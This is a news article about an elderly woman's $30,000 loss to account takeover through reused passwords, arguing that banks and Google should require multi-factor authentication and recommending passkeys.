MFA-Optional Banks Leave Customer Accounts Vulnerable to Theft
A personal account of a significant financial loss underscores the risks associated with financial institutions and major tech companies not mandating multi-factor authentication (MFA).

A recent personal tragedy has brought into sharp focus the critical security gap left by financial institutions and major tech providers that do not enforce multi-factor authentication (MFA) on customer accounts. The author recounts how their 84-year-old mother lost $30,000 from her bank accounts after attackers compromised her Gmail and financial accounts, likely by exploiting reused credentials from a past data breach.
The incident, which occurred in May, saw thieves systematically drain funds from the mother's checking and savings accounts. Their sophistication was evident in their ability to create spam filters within her Gmail account to intercept any alerts from her bank or retirement savings provider, preventing her from being notified of the fraudulent transactions or the creation of new accounts in her name. This allowed the attackers to operate undetected for a period, highlighting a severe lapse in security that a mandatory MFA policy could have prevented.
While the exact method of initial compromise remains unconfirmed, the author points to the reuse of passwords across multiple accounts, including one known to have been part of a previous data breach, as the probable vector. This common vulnerability, when combined with the absence of MFA on critical accounts like Gmail and her banking services, provided a clear path for cybercriminals to gain unauthorized access and execute their theft.
Gregory Shein, CEO of Nomadic Soft, a SaaS company serving fintech clients, noted that many consumers mistakenly believe MFA is universally required by banks. He explained that some institutions still offer MFA as an optional feature, balancing security concerns against potential user friction, such as reduced conversion rates, increased support tickets, and frustration for less tech-savvy customers.
Major financial institutions like Bank of America, Chase, Capital One, and Citibank, along with Google, still offer MFA as an optional setting. This contrasts with institutions like PNC, which mandate it. The author's mother was fortunate that one of her financial institutions flagged a suspicious transaction, leading to the protection of that specific account. However, the damage to her other accounts had already been done.
After a lengthy and arduous process of reporting the theft, involving unhelpful initial responses from the bank's fraud department, the stolen funds were eventually restored. This outcome, however, is not guaranteed for all victims. In the U.S., consumers have a limited window to dispute transactions, and banks have discretion in determining the legitimacy of claims, potentially leaving victims without recourse.
The incident serves as a stark reminder that while user error, such as password reuse, plays a role, the responsibility also lies with service providers to implement robust security measures. Just as banks require PINs for ATM cards, the author argues that mandatory MFA should be a baseline security requirement for all financial and sensitive online accounts.
Andrew Shikiar, CEO of the FIDO Alliance, acknowledged the industry's concern about user friction, which has slowed the widespread adoption of stronger authentication. However, he emphasized the significant security benefits, with Microsoft data suggesting MFA can prevent up to 99.9% of account attacks. While acknowledging that MFA methods like SMS-based one-time passcodes can be vulnerable, the article points to passkeys as a more secure, phishing-resistant alternative that combines device-based security with cryptographic key pairs.